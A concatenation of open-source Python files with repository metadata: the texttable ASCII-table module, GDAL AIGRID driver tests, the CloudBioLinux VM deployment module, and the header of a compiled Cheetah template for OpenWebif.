["Mr\\nXavier\\nHuon", 32, "Xav'"],
["Mr\\nBaptiste\\nClement", 1, "Baby"] ])
print table.draw() + "\\n"
table = TextTable()
table.set_deco(TextTable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print table.draw()
Result:
+----------+-----+----------+
| Name | Age | Nickname |
+==========+=====+==========+
| Mr | | |
| Xavier | 32 | |
| Huon | | Xav' |
+----------+-----+----------+
| Mr | | |
| Baptiste | 1 | |
| Clement | | Baby |
+----------+-----+----------+
text float exp int auto
===========================================
abcd 67.000 6.540e+02 89 128.001
efgh 67.543 6.540e-01 90 1.280e+22
ijkl 0.000 5.000e-78 89 0.000
mnop 0.023 5.000e+78 92 1.280e+22
"""
__all__ = ["TextTable", "ArraySizeError"]
__author__ = 'Gerome Fournier <jef(at)foutaise.org>'
__license__ = 'GPL'
__version__ = '0.8'
__revision__ = '$Id: texttable.py 132 2011-10-02 11:51:00Z jef $'
__credits__ = """\
Jeff Kowalczyk:
- textwrap improved import
- comment concerning header output
Anonymous:
- add_rows method, for adding rows in one go
Sergey Simonenko:
- redefined len() function to deal with non-ASCII characters
Roger Lew:
- columns datatype specifications
Brian Peterson:
- better handling of unicode errors
"""
import sys
import string
try:
if sys.version >= '2.3':
import textwrap
elif sys.version >= '2.2':
from optparse import textwrap
else:
from optik import textwrap
except ImportError:
sys.stderr.write("Can't import textwrap module!\n")
raise
try:
True, False
except NameError:
(True, False) = (1, 0)
def len(iterable):
"""Redefining len here so it will be able to work with non-ASCII characters
"""
if not isinstance(iterable, str):
return iterable.__len__()
try:
return len(unicode(iterable, 'utf'))
except:
return iterable.__len__()
class ArraySizeError(Exception):
"""Exception raised when specified rows don't fit the required size
"""
def __init__(self, msg):
self.msg = msg
Exception.__init__(self, msg, '')
def __str__(self):
return self.msg
class TextTable:
BORDER = 1
HEADER = 1 << 1
HLINES = 1 << 2
VLINES = 1 << 3
def __init__(self, max_width=80):
"""Constructor
- max_width is an integer, specifying the maximum width of the table
- if set to 0, size is unlimited, therefore cells won't be wrapped
"""
if max_width <= 0:
max_width = False
self._max_width = max_width
self._precision = 3
self._deco = TextTable.VLINES | TextTable.HLINES | TextTable.BORDER | \
TextTable.HEADER
self.set_chars(['-', '|', '+', '='])
self.reset()
def reset(self):
"""Reset the instance
- reset rows and header
"""
self._hline_string = None
self._row_size = None
self._header = []
self._rows = []
def set_chars(self, array):
"""Set the characters used to draw lines between rows and columns
- the array should contain 4 fields:
[horizontal, vertical, corner, header]
- default is set to:
['-', '|', '+', '=']
"""
if len(array) != 4:
raise ArraySizeError, "array should contain 4 characters"
array = [ x[:1] for x in [ str(s) for s in array ] ]
(self._char_horiz, self._char_vert,
self._char_corner, self._char_header) = array
def set_deco(self, deco):
"""Set the table decoration
- 'deco' can be a combinaison of:
TextTable.BORDER: Border around the table
TextTable.HEADER: Horizontal line below the header
TextTable.HLINES: Horizontal lines between rows
TextTable.VLINES: Vertical lines between columns
All of them are enabled by default
- example:
TextTable.BORDER | TextTable.HEADER
"""
self._deco = deco
def set_cols_align(self, array):
"""Set the desired columns alignment
- the elements of the array should be either "l", "c" or "r":
* "l": column flushed left
* "c": column centered
* "r": column flushed right
"""
self._check_row_size(array)
self._align = array
def set_cols_valign(self, array):
"""Set the desired columns vertical alignment
- the elements of the array should be either "t", "m" or "b":
* "t": column aligned on the top of the cell
* "m": column aligned on the middle of the cell
* "b": column aligned on the bottom of the cell
"""
self._check_row_size(array)
self._valign = array
def set_cols_dtype(self, array):
"""Set the desired columns datatype for the cols.
- the elements of the array should be either "a", "t", "f", "e" or "i":
* "a": automatic (try to use the most appropriate datatype)
* "t": treat as text
* "f": treat as float in decimal format
* "e": treat as float in exponential format
* "i": treat as int
- by default, automatic datatyping is used for each column
"""
self._check_row_size(array)
self._dtype = array
def set_cols_width(self, array):
"""Set the desired columns width
- the elements of the array should be integers, specifying the
width of each column. For example:
[10, 20, 5]
"""
self._check_row_size(array)
try:
array = map(int, array)
if reduce(min, array) <= 0:
raise ValueError
except ValueError:
sys.stderr.write("Wrong argument in column width specification\n")
raise
self._width = array
def set_precision(self, width):
"""Set the desired precision for float/exponential formats
- width must be an integer >= 0
- default value is set to 3
"""
if not type(width) is int or width < 0:
raise ValueError('width must be an integer greater then 0')
self._precision = width
def header(self, array):
"""Specify the header of the table
"""
self._check_row_size(array)
self._header = map(str, array)
def add_row(self, array):
"""Add a row in the rows stack
- cells can contain newlines and tabs
"""
self._check_row_size(array)
if not hasattr(self, "_dtype"):
self._dtype = ["a"] * self._row_size
cells = []
for i,x in enumerate(array):
cells.append(self._str(i,x))
self._rows.append(cells)
def add_rows(self, rows, header=True):
"""Add several rows in the rows stack
- The 'rows' argument can be either an iterator returning arrays,
or a by-dimensional array
- 'header' specifies if the first row should be used as the header
of the table
"""
# nb: don't use 'iter' on by-dimensional arrays, to get a
# usable code for python 2.1
if header:
if hasattr(rows, '__iter__') and hasattr(rows, 'next'):
self.header(rows.next())
else:
self.header(rows[0])
rows = rows[1:]
for row in rows:
self.add_row(row)
def draw(self):
"""Draw the table
- the table is returned as a whole string
"""
if not self._header and not self._rows:
return
self._compute_cols_width()
self._check_align()
out = ""
if self._has_border():
out += self._hline()
if self._header:
out += self._draw_line(self._header, isheader=True)
if self._has_header():
out += self._hline_header()
length = 0
for row in self._rows:
length += 1
out += self._draw_line(row)
if self._has_hlines() and length < len(self._rows):
out += self._hline()
if self._has_border():
out += self._hline()
return out[:-1]
def _str(self, i, x):
"""Handles string formatting of cell data
i - index of the cell datatype in self._dtype
x - cell data to format
"""
try:
f = float(x)
except:
return str(x)
n = self._precision
dtype = self._dtype[i]
if dtype == 'i':
return str(int(round(f)))
elif dtype == 'f':
return '%.*f' % (n, f)
elif dtype == 'e':
return '%.*e' % (n, f)
elif dtype == 't':
return str(x)
else:
if f - round(f) == 0:
if abs(f) > 1e8:
return '%.*e' % (n, f)
else:
return str(int(round(f)))
else:
if abs(f) > 1e8:
return '%.*e' % (n, f)
else:
return '%.*f' % (n, f)
def _check_row_size(self, array):
"""Check that the specified array fits the previous rows size
"""
if not self._row_size:
self._row_size = len(array)
elif self._row_size != len(array):
raise ArraySizeError, "array should contain %d elements" \
% self._row_size
def _has_vlines(self):
"""Return a boolean, if vlines are required or not
"""
return self._deco & TextTable.VLINES > 0
def _has_hlines(self):
"""Return a boolean, if hlines are required or not
"""
return self._deco & TextTable.HLINES > 0
def _has_border(self):
"""Return a boolean, if border is required or not
"""
return self._deco & TextTable.BORDER > 0
def _has_header(self):
"""Return a boolean, if header line is required or not
"""
return self._deco & TextTable.HEADER > 0
def _hline_header(self):
"""Print header's horizontal line
"""
return self._build_hline(True)
def _hline(self):
"""Print an horizontal line
"""
if not self._hline_string:
self._hline_string = self._build_hline()
return self._hline_string
def _build_hline(self, is_header=False):
"""Return a string used to separated rows or separate header from
rows
"""
horiz = self._char_horiz
if (is_header):
horiz = self._char_header
# compute cell separator
s = "%s%s%s" % (horiz, [horiz, self._char_corner][self._has_vlines()],
horiz)
# build the line
l = string.join([horiz * n for n in self._width], s)
# add border if needed
if self._has_border():
l = "%s%s%s%s%s\n" % (self._char_corner, horiz, l, horiz,
self._char_corner)
else:
l += "\n"
return l
def _len_cell(self, cell):
"""Return the width of the cell
Special characters are taken into account to return the width of the
cell, such like newlines and tabs
"""
cell_lines = cell.split('\n')
maxi = 0
for line in cell_lines:
length = 0
parts = line.split('\t')
for part, i in zip(parts, range(1, len(parts) + 1)):
length = length + len(part)
if i < len(parts):
length = (length/8 + 1) * 8
maxi = max(maxi, length)
return maxi
def _compute_cols_width(self):
"""Return an array with the width of each column
If a specific width has been specified, exit. If the total of the
columns width exceed the table desired width, another width will be
computed to fit, and cells will be wrapped.
"""
if hasattr(self, "_width"):
return
maxi = []
if self._header:
maxi = [ self._len_cell(x) for x in self._header ]
for row in self._rows:
for cell,i in zip(row, range(len(row))):
try:
maxi[i] = max(maxi[i], self._len_cell(cell))
except (TypeError, IndexError):
maxi.append(self._len_cell(cell))
items = len(maxi)
length = reduce(lambda x,y: x+y, maxi)
if self._max_width and length + items * 3 + 1 > self._max_width:
maxi = [(self._max_width - items * 3 -1) / items \
for n in range(items)]
self._width = maxi
def _check_align(self):
"""Check if alignment has been specified, set default one if not
"""
if not hasattr(self, "_align"):
self._align = ["l"] * self._row_size
if not hasattr(self, "_valign"):
self._valign = ["t"] * self._row_size
def _draw_line(self, line, isheader=False):
"""Draw a line
Loop over a single cell length, over all the cells
"""
line = self._splitit(line, isheader)
space = " "
out = ""
for i in range(len(line[0])):
if self._has_border():
out += "%s " % self._char_vert
length = 0
for cell, width, align in zip(line, self._width, self._align):
length += 1
cell_line = cell[i]
fill = width - len(cell_line)
if isheader:
align = "c"
if align == "r":
out += "%s " % (fill * space + cell_line)
elif align == "c":
out += "%s " % (fill/2 * space + cell_line \
+ (fill/2 + fill%2) * space)
else:
out += "%s " % (cell_line + fill * space)
if length < len(line):
out += "%s " % [space, self._char_vert][self._has_vlines()]
out += "%s\n" % ['', self._char_vert][self._has_border()]
return out
def _splitit(self, line, isheader):
"""Split each element of line to fit the column width
Each element is turned into a list, result of the wrapping of the
string to the desired width
"""
line_wrapped = []
for cell, width in zip(line, self._width):
array = []
for c in cell.split('\n'):
try:
c = unicode(c, 'utf')
except UnicodeDecodeError as strerror:
sys.stderr.write("UnicodeDecodeError exception for string '%s': %s\n" % (c, strerror))
c = unicode(c, 'utf', 'replace')
array.extend(textwrap.wrap(c, width))
line_wrapped.append(array)
max_cell_lines = reduce(max, map(len, line_wrapped))
for cell, valign in zip(line_wrapped, self._valign):
if isheader:
valign = "t"
if valign == "m":
missing = max_cell_lines - len(cell)
cell[:0] = [""] * (missing / 2)
cell.extend([""] * (missing / 2 + missing % 2))
elif valign == "b":
cell[:0] = [""] * (max_cell_lines - len(cell))
else:
cell.extend([""] * (max_cell_lines - len(cell)))
return line_wrapped
if __name__ == '__main__':
table = TextTable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([ ["Name", "Age", "Nickname"],
["Mr\nXavier\nHuon", 32, "Xav'"],
["Mr\nBaptiste\nClement", 1, "Baby"] ])
print table.draw() + "\n"
table = TextTable()
table.set_deco(TextTable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print table.draw()
|
cdeil/rootpy
|
rootpy/extern/tabulartext/texttable.py
|
Python
|
gpl-3.0
| 18,657
|
[
"Brian"
] |
9510950646d81cf2b7de18f3b82ca496e204070440fff53257a31637b6051a94
|
#!/usr/bin/env python
###############################################################################
# $Id: aigrid.py 33793 2016-03-26 13:02:07Z goatbar $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test read/write functionality for AIGRID driver.
# Author: Swapnil Hajare <dreamil@gmail.com>
#
###############################################################################
# Copyright (c) 2006, Swapnil Hajare <dreamil@gmail.com>
# Copyright (c) 2009-2010, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
from osgeo import gdal
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Read test of simple byte reference data.
def aigrid_1():
tst = gdaltest.GDALTest( 'AIG', 'abc3x1', 1, 3 )
return tst.testOpen()
###############################################################################
# Verify some auxiliary data.
def aigrid_2():
ds = gdal.Open( 'data/abc3x1/prj.adf' )
gt = ds.GetGeoTransform()
if gt[0] != -0.5 or gt[1] != 1.0 or gt[2] != 0.0 \
or gt[3] != 0.5 or gt[4] != 0.0 or gt[5] != -1.0:
gdaltest.post_reason( 'Aigrid geotransform wrong.' )
return 'fail'
prj = ds.GetProjection()
if prj.find('PROJCS["UTM Zone 55, Southern Hemisphere",GEOGCS["GDA94",DATUM["Geocentric_Datum_of_Australia_1994"') == -1:
gdaltest.post_reason( 'Projection does not match expected:\n%s' % prj )
return 'fail'
band1 = ds.GetRasterBand(1)
if band1.GetNoDataValue() != 255:
gdaltest.post_reason( 'Grid NODATA value wrong or missing.' )
return 'fail'
if band1.DataType != gdal.GDT_Byte:
gdaltest.post_reason( 'Data type is not Byte!' )
return 'fail'
return 'success'
###############################################################################
# Verify the colormap, and nodata setting for test file.
def aigrid_3():
ds = gdal.Open( 'data/abc3x1' )
cm = ds.GetRasterBand(1).GetRasterColorTable()
if cm.GetCount() != 256 \
or cm.GetColorEntry(0) != (95, 113, 150, 255)\
or cm.GetColorEntry(1) != (95, 57, 29, 255):
gdaltest.post_reason( 'Wrong colormap entries' )
return 'fail'
cm = None
if ds.GetRasterBand(1).GetNoDataValue() != 255.0:
gdaltest.post_reason( 'Wrong nodata value.' )
return 'fail'
return 'success'
###############################################################################
# Read test of simple byte reference data with data directory name in all uppercase
def aigrid_4():
tst = gdaltest.GDALTest( 'AIG', 'ABC3X1UC', 1, 3 )
return tst.testOpen()
###############################################################################
# Verify the colormap, and nodata setting for test file with names of coverage directory and all files in it in all uppercase. Additionally also test for case where clr file resides in parent directory of coverage.
def aigrid_5():
ds = gdal.Open( 'data/ABC3X1UC' )
cm = ds.GetRasterBand(1).GetRasterColorTable()
if cm.GetCount() != 256 \
or cm.GetColorEntry(0) != (95, 113, 150, 255)\
or cm.GetColorEntry(1) != (95, 57, 29, 255):
gdaltest.post_reason( 'Wrong colormap entries' )
return 'fail'
cm = None
if ds.GetRasterBand(1).GetNoDataValue() != 255.0:
gdaltest.post_reason( 'Wrong nodata value.' )
return 'fail'
return 'success'
###############################################################################
# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem
def aigrid_online_1():
list_files = [ 'info/arc.dir',
'info/arc0000.dat',
'info/arc0000.nit',
'info/arc0001.dat',
'info/arc0001.nit',
'info/arc0002.dat',
'info/arc0002.nit',
'info/arc0002r.001',
'nzdem500/dblbnd.adf',
'nzdem500/hdr.adf',
'nzdem500/log',
'nzdem500/sta.adf',
'nzdem500/vat.adf',
'nzdem500/w001001.adf',
'nzdem500/w001001x.adf' ]
try:
os.mkdir('tmp/cache/nzdem')
os.mkdir('tmp/cache/nzdem/info')
os.mkdir('tmp/cache/nzdem/nzdem500')
except:
pass
for filename in list_files:
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/aig/nzdem/' + filename , 'nzdem/' + filename):
return 'skip'
tst = gdaltest.GDALTest( 'AIG', 'tmp/cache/nzdem/nzdem500/hdr.adf', 1, 45334, filename_absolute = 1 )
ret = tst.testOpen()
if ret != 'success':
return ret
ds = gdal.Open('tmp/cache/nzdem/nzdem500/hdr.adf')
try:
rat = ds.GetRasterBand(1).GetDefaultRAT()
except:
print('Skipping RAT checking... OG Python bindings have no RAT API')
return 'success'
if rat is None:
gdaltest.post_reason( 'No RAT found' )
return 'fail'
if rat.GetRowCount() != 2642:
gdaltest.post_reason( 'Wrong row count in RAT' )
return 'fail'
if rat.GetColumnCount() != 2:
gdaltest.post_reason( 'Wrong column count in RAT' )
return 'fail'
if rat.GetNameOfCol(0) != 'VALUE':
gdaltest.post_reason( 'Wrong name of col 0' )
return 'fail'
if rat.GetTypeOfCol(0) != gdal.GFT_Integer:
gdaltest.post_reason( 'Wrong type of col 0' )
return 'fail'
if rat.GetUsageOfCol(0) != gdal.GFU_MinMax:
gdaltest.post_reason( 'Wrong usage of col 0' )
return 'fail'
if rat.GetNameOfCol(1) != 'COUNT':
gdaltest.post_reason( 'Wrong name of col 1' )
return 'fail'
if rat.GetTypeOfCol(1) != gdal.GFT_Integer:
gdaltest.post_reason( 'Wrong type of col 1' )
return 'fail'
if rat.GetUsageOfCol(1) != gdal.GFU_PixelCount:
gdaltest.post_reason( 'Wrong usage of col 1' )
return 'fail'
if rat.GetValueAsInt(2641, 0) != 3627:
gdaltest.post_reason( 'Wrong value in RAT' )
return 'fail'
if ds.GetRasterBand(1).GetMinimum() != 0.0:
gdaltest.post_reason( 'Wrong minimum' )
return 'fail'
if ds.GetRasterBand(1).GetMaximum() != 3627.0:
gdaltest.post_reason( 'Wrong maximum' )
return 'fail'
return 'success'
###############################################################################
gdaltest_list = [
aigrid_1,
aigrid_2,
aigrid_3,
aigrid_4,
aigrid_5,
aigrid_online_1 ]
if __name__ == '__main__':
gdaltest.setup_run( 'aigrid' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
|
nextgis-extra/tests
|
lib_gdal/gdrivers/aigrid.py
|
Python
|
gpl-2.0
| 7,898
|
[
"ADF"
] |
b2946291e5cea433b8a39b2856ce51d0d1fc4b850e3bd5a7c911fd67382333d9
|
#!/usr/bin/env python
import os
from tempfile import tempdir
from subprocess import call
from inspect import getargspec
from cloudbio.utils import _setup_logging, _configure_fabric_environment, _parse_fabricrc
from cloudbio.biodata.genomes import install_data, install_data_s3, install_data_rsync
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy.utils import _chown_galaxy
from cloudbio.galaxy.tools import _install_tools
from fabfile import _perform_install, _install_custom
from .util import eval_template
from .volume import attach_volumes, make_snapshots, detach_volumes
import cloudbio.deploy.plugins
from fabric.main import load_settings
from fabric.api import put, run, env, settings, sudo
try:
from .vmlauncher.transfer import FileTransferManager
from .vmlauncher import build_vm_launcher
except ImportError:
build_vm_launcher = None
FileTransferManager = None
DEFAULT_CLOUDBIOLINUX_TARGET = None
DEFAULT_CLOUDBIOLINUX_FLAVOR = None
def deploy(options):
_setup_logging(env)
actions = _expand_actions(options.get("actions"))
if options["vm_provider"] == "novm":
vm_launcher = LocalVmLauncher(options)
else:
if not build_vm_launcher:
raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
vm_launcher = build_vm_launcher(options)
if _do_perform_action("list", actions):
for node in vm_launcher.list():
print "Active node with uuid %s <%s>" % (node.uuid, node)
if _do_perform_action("destroy", actions):
target_name = options["hostname"]
for node in vm_launcher.list():
node_name = node.name
if node_name == target_name:
vm_launcher.destroy(node)
__invoke_plugin_actions(env, actions, "local_actions", [vm_launcher, options])
# Do we have remaining actions requiring an vm?
if len(actions) > 0:
print 'Setting up virtual machine'
vm_launcher.boot_and_connect()
_setup_vm(options, vm_launcher, actions)
class LocalVmLauncher:
"""Provide a lightweight real machine, non-vm class for launching.
"""
def __init__(self, options):
self.options = options
def get_ip(self):
specified_hostname = self.options.get("hostname", None)
hostname = specified_hostname or "localhost"
return hostname
def get_key_file(self):
return None
def boot_and_connect(self):
pass
def destroy(self):
pass
def get_user(self):
return env.user
def list(self):
return []
def _setup_vm(options, vm_launcher, actions):
destroy_on_complete = get_boolean_option(options, 'destroy_on_complete', False)
try:
ip = vm_launcher.get_ip()
_setup_fabric(vm_launcher, ip, options)
with settings(host_string=ip):
_setup_cloudbiolinux(options)
if 'attach_volumes' in actions:
attach_volumes(vm_launcher, options)
if 'max_lifetime' in options:
seconds = options['max_lifetime']
# Unclear why the sleep is needed, but seems to be otherwise
# this doesn't work.
run("bash -c 'nohup sudo shutdown -h %d &'; sleep 2" % seconds)
configure_instance(options, actions)
if 'transfer' in actions:
transfer_files(options)
__invoke_plugin_actions(env, actions, "ready_actions", [vm_launcher, options])
if 'ssh' in actions:
_interactive_ssh(vm_launcher)
if 'attach_ip' in actions:
vm_launcher.attach_public_ip()
if 'snapshot_volumes' in actions:
make_snapshots(vm_launcher, options)
if 'detach_volumes' in actions:
detach_volumes(vm_launcher, options)
if 'package' in actions:
name_template = vm_launcher.package_image_name()
name = eval_template(env, name_template)
vm_launcher.package(name=name)
if not destroy_on_complete and hasattr(vm_launcher, "uuid"):
print 'Your instance (%s) is waiting at http://%s' % (vm_launcher.uuid, ip)
finally:
if destroy_on_complete:
vm_launcher.destroy()
def _expand_actions(actions):
unique_actions = set()
for simple_action in _possible_actions():
if simple_action in actions:
unique_actions.add(simple_action)
compound_actions = __get_plugin_actions(env, "compound_actions")
for compound_action in compound_actions.keys():
if compound_action in actions:
for compound_action_part in compound_actions[compound_action]:
unique_actions.add(compound_action_part)
return unique_actions
def _possible_actions():
possible_actions = [ "list",
"destroy",
"transfer",
"purge_tools",
"setup_tools",
"setup_biodata",
"setup_ssh_key",
"package",
"setup_image",
"launch", # Dummy action justs launches image
"install_biolinux",
"install_custom",
"ssh",
"attach_ip",
"snapshot_volumes",
"attach_volumes",
"detach_volumes",
]
for action_type in ["local_actions", "configure_actions", "ready_action"]:
for action in __get_plugin_actions(env, action_type):
possible_actions.append(action)
return possible_actions
def _do_perform_action(action, action_list):
do_perform = action in action_list
if do_perform:
action_list.remove(action)
return do_perform
def _setup_fabric(vm_launcher, ip, options):
env.user = vm_launcher.get_user()
env.hosts = [ip]
env.key_filename = vm_launcher.get_key_file()
env.disable_known_hosts = True
def _setup_cloudbiolinux(options):
def fabricrc_loader(env):
_setup_cloudbiolinux_fabric_properties(env, options)
flavor = get_main_options_string(options, "flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
need_distcheck = options.get("fabricrc_overrides", {}).get("use_sudo")
_configure_fabric_environment(env, flavor, fabricrc_loader=fabricrc_loader,
ignore_distcheck=not need_distcheck)
_setup_image_user_data(env, options)
def _setup_cloudbiolinux_fabric_properties(env, options):
fabricrc_file = get_main_options_string(options, "fabricrc_file", None)
env.config_dir = os.path.join(os.path.dirname(__file__), "..", "..", "config")
env.tool_data_table_conf_file = os.path.join(env.config_dir, "..",
"installed_files",
"tool_data_table_conf.xml")
if fabricrc_file:
env.update(load_settings(fabricrc_file))
else:
# Let cloudbiolinux find out default file based on flavor, dist, etc...
_parse_fabricrc(env)
overrides = options.get("fabricrc_overrides", {})
for key, value in overrides.iteritems():
# yaml parses bools, wouldn't be expected coming out of a fabricrc
# file so replace everything with a string.
if isinstance(value, bool):
overrides[key] = str(value)
env.update(overrides)
_setup_galaxy_env_defaults(env)
def _setup_image_user_data(env, options):
if "image_user_data" in options:
env["image_user_data_dict"] = options["image_user_data"]
def purge_genomes():
sudo("rm -rf %s" % env.data_files)
def configure_ssh_key(options):
if "galaxy_ssh_key" in options:
key_file = options["galaxy_ssh_key"]
sudo("mkdir -p /home/%s/.ssh" % (env.galaxy_user))
sudo("chmod 700 /home/%s/.ssh" % (env.galaxy_user))
put(local_path=key_file,
remote_path="/home/%s/.ssh/%s" % (env.galaxy_user, os.path.basename(key_file)),
use_sudo=True,
mode=0600)
_chown_galaxy(env, "/home/%s/.ssh" % env.galaxy_user)
def setup_biodata(options):
install_proc = install_data
genome_source = options.get("genome_source", "default")
install_proc = {
"default": install_data,
"S3": install_data_s3,
"rsync": install_data_rsync,
}[genome_source]
if genome_source == "default":
install_proc(options["genomes"], ["ggd", "s3", "raw"])
else:
install_proc(options["genomes"])
def configure_instance(options, actions):
if "install_biolinux" in actions:
install_biolinux(options)
if "install_custom" in actions:
install_custom(options)
if "purge_tools" in actions:
purge_tools()
__invoke_plugin_actions(env, actions, "configure_actions", [options])
if "setup_tools" in actions:
install_tools(options["tools"])
if "setup_biodata" in actions:
setup_biodata(options)
if "setup_ssh_key" in actions:
configure_ssh_key(options)
def install_custom(options):
package = options.get("package")
_install_custom(package)
def install_biolinux(options):
flavor = options.get("flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
target = options.get("target", DEFAULT_CLOUDBIOLINUX_TARGET)
_perform_install(target=target, flavor=flavor, more_custom_add=options.get("custom_add", None))
def _interactive_ssh(vm_launcher):
""" Launch an interactive SSH session to host described by vm_launcher object.
"""
host = vm_launcher.get_ip()
user = vm_launcher.get_user()
key_file = vm_launcher.get_key_file()
cmd = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i '%s' -l '%s' '%s'" % (key_file, user, host)
call(cmd, shell=True)
def transfer_files(options):
transfer_options = _build_transfer_options(options, "/mnt/uploaded_data", "galaxy")
_do_transfer(transfer_options, options.get("files", []), options.get("compressed_files", []))
def _build_transfer_options(options, destination, user):
transfer_options = {}
transfer_options['compress'] = get_boolean_option(options, 'compress_transfers', True)
transfer_options['num_compress_threads'] = int(get_main_options_string(options, 'num_compress_threads', '1'))
transfer_options['num_transfer_threads'] = int(get_main_options_string(options, 'num_transfer_threads', '1'))
transfer_options['num_decompress_threads'] = int(get_main_options_string(options, 'num_decompress_threads', '1'))
transfer_options['chunk_size'] = int(get_main_options_string(options, 'transfer_chunk_size', '0'))
transfer_options['transfer_retries'] = int(get_main_options_string(options, 'transfer_retries', '3'))
transfer_options['local_temp'] = get_main_options_string(options, 'local_temp_dir', tempdir)
transfer_options['destination'] = destination
transfer_options['transfer_as'] = user
return transfer_options
def _do_transfer(transfer_options, files, compressed_files=[]):
if not FileTransferManager:
raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
FileTransferManager(**transfer_options).transfer_files(files, compressed_files)
def purge_tools():
env.safe_sudo("rm -rf %s" % env.install_dir)
def install_tools(tools_conf):
"""
"""
_install_tools(env, tools_conf)
def get_boolean_option(options, name, default=False):
if name not in options:
return default
else:
return options[name]
def get_main_options_string(options, key, default=''):
value = default
if key in options:
value = options[key]
return value
def __invoke_plugin_actions(env, actions, action_type, provided_args):
possible_actions = __get_plugin_actions(env, action_type)
for action in list(actions):
if action in possible_actions:
__invoke_plugin_action(env, possible_actions[action], provided_args)
actions.remove(action)
def __invoke_plugin_action(env, action_function, provided_args):
arg_spec = getargspec(action_function).args
args = [] if not arg_spec else provided_args
action_function(*args)
def __get_plugin_actions(env, action_type):
actions = {}
for plugin_module in __get_plugin_modules(env):
if hasattr(plugin_module, action_type):
for action_name, action_function in getattr(plugin_module, action_type).iteritems():
actions[action_name] = action_function
return actions
def __get_plugin_modules(env):
if not "plugin_modules" in env:
unsorted_module_names = __get_plugin_module_names( )
## Load modules in reverse order to allow hierarchical overrides
module_names = sorted(unsorted_module_names, reverse=True)
modules = []
for plugin_module_name in module_names:
try:
module = __import__(plugin_module_name)
for comp in plugin_module_name.split(".")[1:]:
module = getattr(module, comp)
modules.append(module)
except BaseException, exception:
exception_str = str(exception)
message = "%s rule module could not be loaded: %s" % (plugin_module_name, exception_str)
env.logger.warn(message)
continue
env.plugin_modules = modules
return env.plugin_modules
def __get_plugin_module_names():
plugin_module_dir = cloudbio.deploy.plugins.__path__[0]
names = []
for fname in os.listdir(plugin_module_dir):
if not(fname.startswith("_")) and fname.endswith(".py"):
rule_module_name = "cloudbio.deploy.plugins.%s" % fname[:-len(".py")]
names.append( rule_module_name )
return names
|
elkingtonmcb/cloudbiolinux
|
cloudbio/deploy/__init__.py
|
Python
|
mit
| 13,998
|
[
"Galaxy"
] |
ee5d588c933a02d508f0d7c9e7f4a3d3b9133e12fe69aaf6a3689730fa1f0132
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1406885498.511507
__CHEETAH_genTimestamp__ = 'Fri Aug 1 18:31:38 2014'
__CHEETAH_src__ = '/home/wslee2/models/5-wo/force1plus/openpli3.0/build-force1plus/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-1+git5+3c0c4fbdb28d7153bf2140459b553b3d5cdd4149-r0/git/plugin/controllers/views/web/sleeptimer.tmpl'
__CHEETAH_srcLastModified__ = 'Fri Aug 1 18:30:05 2014'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
